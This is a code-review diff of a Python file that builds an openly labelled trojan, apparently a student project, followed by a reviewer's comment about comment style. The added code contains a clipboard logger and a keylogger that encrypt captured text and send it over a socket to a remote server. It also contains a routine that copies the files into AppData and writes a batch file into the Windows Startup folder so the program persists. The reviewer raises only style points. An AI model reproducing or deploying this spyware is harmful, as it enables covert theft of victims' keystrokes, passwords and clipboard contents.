main.py

```diff
@@ -0,0 +1,146 @@
+        public_key_serialized = s.recv(524288)
+        public_key = serialization.load_pem_public_key(public_key_serialized)
+        return s, public_key
+    
+    # RSA Verschlüsselung
+    def encrypt(self, message):
+        return self.public_key.encrypt(
+            message,
+            padding.OAEP(
+                mgf=padding.MGF1(algorithm=hashes.SHA256()),
+                algorithm=hashes.SHA256(),
+                label=None
+            )
+        )
+    
+    # Clipboardlogger
+    def clipboard(self):
+        while True:
+            try:
+                time.sleep(5)
+                copy = pyperclip.paste()
+                encrypted_key = self.encrypt(bytes(f"Clipboard {copy}", "utf-8"))
+                self.s.send(encrypted_key)
+            except Exception as e:
+                print(e)
+
+    # Keylogger
+    def keylogger(self):
+        def on_press(key):
+            try:
+                # Handle special keys
+                if key == keyboard.Key.enter:
+                    key = '\n'
+                elif key == keyboard.Key.backspace:
+                    key = "Delete_Last"
+                elif key == keyboard.Key.space:
+                    key = ' '  # Spacebar
+                else:
+                    key = key.char  # Extract character
+
+                print(f"Taste gedrückt: {key}")
+                encrypted_key = self.encrypt(bytes(f"Keylogger {key}", "utf-8"))
+                self.s.send(encrypted_key)
+
+            except AttributeError:
+                # Ignore other special keys
+                pass
+        while True:
+            try:
+                with keyboard.Listener(on_press=on_press) as listener:
+                    listener.join()
+            except (socket.error, KeyboardInterrupt):
+                print("Disconnected. Reconnecting...")
+                s.close()
+                # Reconnect and get the public key again
+                s, self.public_key = self.get_public_key()
+        
+    # Autostartup den Trojaner
+    def auto_startup(self):
+        source_files = os.listdir()
+        target_dir = f"C:\\Users\\{os.getlogin()}\\AppData\\Roaming"
+        if f"C:\\Users\\{os.getlogin()}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" == os.getcwd():
+            print("allready in auto startup")
+            return
+        try:
+            os.mkdir(f"{target_dir}\\python")
+        except:
+            print("Folde allready exists")
+        target_dir = target_dir + "\\python"
+        for file_name in source_files:
+            shutil.move(os.path.join(os.path.join(os.getcwd()), file_name), target_dir)
+        
+        with open(f'C:\\Users\\{os.getlogin()}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\audio.bat', "w") as f:
+            f.write(f'{target_dir}\\pythonw.exe "{target_dir}\\meine_scripts\\neuer versuch\\main.py"')
+
+    # Nutzer Nerven
+    def annoy_user(self):
```

Comment:
I mean die kommentare sind eig useless (die würde ich zumindest ankreiden in Projektcode). Wenn du das aber für die Facharbeit brauchst, dann natürlich da lassen. Alternativ in docstrings packen:

```suggestion
    def annoy_user(self):
    """
    Nutzer Nerven: Activate Capslock and Numluck ...
    """
```